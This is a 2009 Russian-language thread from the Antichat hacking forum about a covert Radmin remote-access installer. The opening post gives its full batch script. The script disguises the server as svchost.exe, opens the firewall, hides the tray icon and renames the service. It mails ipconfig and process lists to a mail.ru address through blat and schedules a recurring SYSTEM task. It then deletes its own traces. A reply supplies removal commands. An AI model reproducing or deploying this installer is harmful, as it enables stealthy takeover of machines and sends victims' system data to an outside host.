ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Защита ОС: вирусы, антивирусы, файрволы.
Перезагрузить страницу Подчистка скрытого Radmin'a bat-ом
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Подчистка скрытого Radmin'a bat-ом
  #1  
Старый 08.12.2009, 22:53
Аватар для the_apx
the_apx
Новичок
Регистрация: 08.12.2009
Сообщений: 2
Провел на форуме:
24926

Репутация: 0
Отправить сообщение для the_apx с помощью ICQ
Question Подчистка скрытого Radmin'a bat-ом
Как удалить установленную скрытую сборку Radmin'a bat файлом?

В bat файле установки стоит команда подчистки файлов распакованных самой сборкой посли их копирования в Windows и System32.

А как будет выглядеть текст bat файла который "подчистит" за собой эти файлы из каталогов windows и system32? Тоесть автоматизировать это дело) Чтото вроде таблетки.

Буду весьма благодарен за помощь)

Текст bat файла сборки:
Код:
cmdow @ /HID


copy /y "blat.exe" "%SYSTEMROOT%/system32/blat.exe"
copy /y "blat.lib" "%SYSTEMROOT%/system32/blat.lib"
copy /y "blat.dll" "%SYSTEMROOT%/system32/blat.dll"
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" 
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"

netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE

REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f

"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start

%SYSTEMROOT%/system32/blat.exe -install -server mail.ru -port xxxx -f user@mail.ru -u user -pw pass

ipconfig /all > %systemroot%/system32/ip.txt
tasklist > %systemroot%/system32/task.txt

blat.exe %systemroot%/system32/ip.txt -to user@mail.ru 
blat.exe %systemroot%/system32/task.txt -to user@mail.ru

schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\ip.bat


del cmdow.exe
del blat.exe
del blat.lib
del blat.dll
del raddrv.dll
del admdll.dll
del svchost.exe
del install.bat
 
Ответить с цитированием

  #2  
Старый 10.12.2009, 23:19
Аватар для cheater_man
cheater_man
Постоянный
Регистрация: 13.11.2009
Сообщений: 437
Провел на форуме:
709575

Репутация: 17
По умолчанию
"%SYSTEMROOT%/svchost.exe" /stop
"%SYSTEMROOT%/svchost.exe" /uninstall /silence

del /f /q "%SYSTEMROOT%/svchost.exe"
del /f /q "%SYSTEMROOT%/raddrv.dll"
del /f /q "%SYSTEMROOT%/admdll.dll"

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Начил писать конструктор bat вирусов но есть проблема!! Voland-791 E-Mail 1 01.08.2009 08:23
bat файл делающий кое какие изменения в системе GoodGod PHP, PERL, MySQL, JavaScript 9 18.02.2009 11:49
The Bat! для Vista m0le[x] Мировые новости 1 10.11.2006 17:22
Bat Micr0b Windows 2 25.04.2006 19:49
Взлом The bat SAMOKILLER С/С++, C#, Delphi, .NET, Asm 0 05.04.2005 19:34



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ